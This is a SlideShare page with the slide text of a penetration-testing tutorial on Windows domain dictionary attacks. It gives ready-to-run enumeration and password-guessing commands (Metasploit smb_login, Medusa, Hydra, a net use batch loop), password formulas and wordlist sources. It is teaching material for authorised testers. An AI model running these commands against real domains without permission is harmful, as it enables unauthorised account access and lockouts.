SlideShare a Scribd company logo
Introduction to Windows Dictionary Attacks
Author: Scott Sutherland
Who am I?
Scott Sutherland
• Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: Blogs, white papers,
tools etc
Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe
approach to Windows dictionary attacks
• Provide security professionals with questions
they should be asking their contractors
Before we begin…
Dictionary Attack
Brute Force Attack
Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or
default passwords – “It’s human nature”
• Use accounts as entry points during penetration
tests
What’s the impact?
• Unauthorized access to critical:
‒ Systems
‒ Applications
‒ data
• User impersonation
Are There Alternatives?
Yes.
Approaches typically includes:
• Cracking pw hashes offline with:
‒ Pre-computed hash libraries like Rainbow
Tables
‒ Brute force and dictionary techniques using
tools like Hashcat and John the Ripper
• Dumping clear text passwords from
interactive sessions with Mimikatz
With Alternatives be Covered?
No.
Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for
“USERDNSDOMAIN”
• Review the registry for the default domain
Identify Domains: Tools
Method Tools Auth
DHCP Info IPCONFIG
No
NetBIOS Queries NETSTAT –A <IP> No
DNS Queries nmap -sL <IP Range> -oA output_rnds
./reverseraider -r <IP Range>
./dnswalk victem.com
perl fierce.pl -dns <domainname> -threads
5 -file <domainame>-dns.output
No
Sniffing Wireshark (GUI) + Filter for browser traffic
Network Miner (GUI)
Etherape (GUI)
No
RDP Drop Down nmap –sS –PN –p3389 <IP Range>
Then visit with RDP client
No
Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
Enumerate DCs: Tools
Methods Tools Auth
DNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain>
No
RPC Queries NLTEST /DCLIST <domain>
FindPDC <domain> <request count>
No
Port Scanning NMAP –sS –p389,636 –PN <IP Range>
No
NetBIOS
Scanning
FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT
–A %i
No
NET GROUP
Command
Net group “Domain Controllers” /domain
Yes
LDAP Queries LDAP Administrator (GUI Tool)
Hyena (GUI Tool)
adfind -b -sc dcdmp <domain> -gc | grep -i “>name:”
| gawk -F ” ” “{print $2}” | sort | uniq
Yes
&
No
Enumerate Domain Users: Methods
Unauthenticated Methods
• RPC Queries
• SID Brute Forcing
• SNMP Queries
• LDAP Queries
• Sharepoint Fuzzing
Authenticated Methods
• NET USER command
• WMI commands
Enumerate Domain Users: Tools 1
Methods Tools Auth
RPC
Endpoints
dumpsec.exe /computer=<IP> /rpt=usersonly
/saveas=csv /outfile=domain_users.txt
enum –N <ip>
enum –U <ip>
Yes
&
no
SID Brute
Forcing
ruby c:metasploitmsf3msfcli
auxiliary/scanner/smb/smb_lookupsid
SMBDomain=. MaxRID=10000 RHOSTS=<IP
Address> E > domain_users.txt
Getacct (GUI)
Yes
&
no
SNMP
Queries
ruby c:metasploitmsf3msfcli
auxiliary/scanner/snmp/snmp_enumusers
SMBDomain=. RHOSTS=<IP Address> E
Mibbrowser (GUI)
SNMP Walk
Yes
&
no
Enumerate Domain Users: Tools 2
Methods Tools Auth
LDAP Queries adfind -b DC=<victim>,DC=<com> -f
“objectcategory=user” -gc | grep -i
“sAMAccountName:” | gawk -F “:” “{print $2}” | gawk
-F ” ” “{print $1}”| sort > domain_users.txt
Yes
&
no
Sharepoint
Fuzzing
Fuzz parameters with BURP to enumerate domain
users. Example URL below:
https://www.[website].com/sites/[sitename]/_layouts/
userdisp.aspx?Force=True&ID=[2 ]
Yes
&
no
NET USERS
Command
Net users /domain > domain_users.txt
Yes
WMI
Commands
wmic /user:<user> /password:<password> /node:<IP
address> domain_users.txt
Yes
Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Authenticated Methods
• NET ACCOUNTS
Command
What does it all mean?
• Threshold, duration,
and window
Lockout
threshold: 5
Lockout
duration: 15
Lockout
observation
window : 15
Get Domain Lockout Policy: Tools
Methods Tools Auth
RPC Queries Enum –P <IP Address>
dumpsec.exe /computer=<IP> /rpt=policy
/saveas=csv /outfile=domain_policy.txt
Yes
&
No
NET
ACCOUNTS
COMMAND
NET ACCOUNTS
YEs
Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team>Number>
Popular Dictionaries
• Metasploit dictionaries
• Rock you
• FuzzDB
• John the ripper
Create a Dictionary: Tools
Dictionary URLs / Lists
Classics Blank password
Username as password
password as password
Formulas
<Password><Number>
<Companyname><Number>
<Season><Year>
<Sports team>Number>
Your Brain! Think of keywords relative to the target
company /geographic location and you’ll get more out
of your dictionary attacks!
Rockyou http://www.skullsecurity.org/wiki/index.php/Passwords
FuzzDB http://code.google.com/p/fuzzdb/
https://github.com/rustyrobot/fuzzdb
John the Ripper http://www.openwall.com/wordlists/
Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea = Attempt a few passwords for all
of the domain users each round, not a 1000
passwords against one user
• Subtract 2 attempts from the lockout policy
Example: Lockout=5, Attempts=3
• Wait 5 to 10 minutes beyond the observation
window
Perform Dictionary Attack: Tools
Tools Commands OS
Medusa medusa -H hosts.txt -U users.txt -P passwords.txt -
T 20 -t 10 -L -F -M smbnt
Linux
Bruter Easy to use GUI and not CLI that I know of.
Windows
Metasploit
smb_login
ruby c:metasploitmsf3msfcli
auxiliary/scanner/smb/smb_login THREADS=5
BLANK_PASSWORDS=true USER_AS_PASS=true
PASS_FILE=c:passwords.txt
USER_FILE=c:allusers.txt SMBDomain=.
RHOSTS=192.168.1.1 E
Windows
and Linux
Hydra hydra.exe -L users.txt -P passwords.txt -o
credentials.txt <ip> smb
Windows
and Linux
Batch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) do
net user <ip>IPC$ /user:<user> %a
Windows
Conclusions
• There is more than one way to do
everything!
• Enumerate all available options
• It’s easy to lockout accounts – respect the
password policy 
• Always ask contractors what their approach
is to reduce the chance of account lockouts
during penetration tests

More Related Content

What's hot

10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
NCC Group
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Priyanka Aash
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
Beau Bullock
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
Andrew McNicol
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
Sam Bowne
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
Sam Bowne
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
Sam Bowne
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beau Bullock
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 

What's hot (20)

10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 

Viewers also liked

Thick client application security assessment
Thick client  application security assessmentThick client  application security assessment
Thick client application security assessment
Sanjay Kumar (Seeking options outside India)
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
Declaration of Mal(WAR)e
Declaration of Mal(WAR)eDeclaration of Mal(WAR)e
Declaration of Mal(WAR)e
NetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One -  A ClickOnce Love Story - Secure360 2015All You Need is One -  A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
NetSPI
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Scott Sutherland
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
OWASP Foundation
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Hanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
Keith G. Tidball
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration Testing
The Hacker News
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
NetSPI
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
Antonio Fontes
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
Dmitry Evteev
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
Harshit Singh Bhatia
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
Ammar WK
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability Scanning
SecurityMetrics
 

Viewers also liked (20)

Thick client application security assessment
Thick client  application security assessmentThick client  application security assessment
Thick client application security assessment
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Declaration of Mal(WAR)e
Declaration of Mal(WAR)eDeclaration of Mal(WAR)e
Declaration of Mal(WAR)e
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One -  A ClickOnce Love Story - Secure360 2015All You Need is One -  A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration Testing
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability Scanning
 

Similar to Introduction to Windows Dictionary Attacks

Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
The Security of Things Forum
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
EndgameInc
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
Christian Martorella
 
ethical Hack
ethical Hackethical Hack
ethical Hack
Viggi Unbeaten
 
Wm4
Wm4Wm4
Wm4
Wm4Wm4
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council
 
Gates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringGates Toorcon X New School Information Gathering
Gates Toorcon X New School Information Gathering
Chris Gates
 
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
Andrew McNicol
 
Blue Teaming On A Budget
Blue Teaming On A BudgetBlue Teaming On A Budget
Blue Teaming On A Budget
KevinRiley83
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
Chris Gates
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
Grupo Gesfor I+D+i
 
PHP Performance: Principles and tools
PHP Performance: Principles and toolsPHP Performance: Principles and tools
PHP Performance: Principles and tools
10n Software, LLC
 
Tools kali
Tools kaliTools kali
Tools kali
ketban0702
 
OSINT for Attack and Defense
OSINT for Attack and DefenseOSINT for Attack and Defense
OSINT for Attack and Defense
Andrew McNicol
 

Similar to Introduction to Windows Dictionary Attacks (20)

Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
 
ethical Hack
ethical Hackethical Hack
ethical Hack
 
Wm4
Wm4Wm4
Wm4
 
Wm4
Wm4Wm4
Wm4
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
Gates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringGates Toorcon X New School Information Gathering
Gates Toorcon X New School Information Gathering
 
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
 
Blue Teaming On A Budget
Blue Teaming On A BudgetBlue Teaming On A Budget
Blue Teaming On A Budget
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
PHP Performance: Principles and tools
PHP Performance: Principles and toolsPHP Performance: Principles and tools
PHP Performance: Principles and tools
 
Tools kali
Tools kaliTools kali
Tools kali
 
OSINT for Attack and Defense
OSINT for Attack and DefenseOSINT for Attack and Defense
OSINT for Attack and Defense
 

Recently uploaded

"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users",  Kevin Goedecke"Scaling RAG Applications to serve millions of users",  Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
Fwdays
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
From Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMsFrom Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMs
Sease
 
Demystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through StorytellingDemystifying Knowledge Management through Storytelling
Demystifying Knowledge Management through Storytelling
Enterprise Knowledge
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
ScyllaDB
 
What is an RPA CoE? Session 2 – CoE Roles
What is an RPA CoE?  Session 2 – CoE RolesWhat is an RPA CoE?  Session 2 – CoE Roles
What is an RPA CoE? Session 2 – CoE Roles
DianaGray10
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Fwdays
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Alex Pruden
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 

Recently uploaded (20)

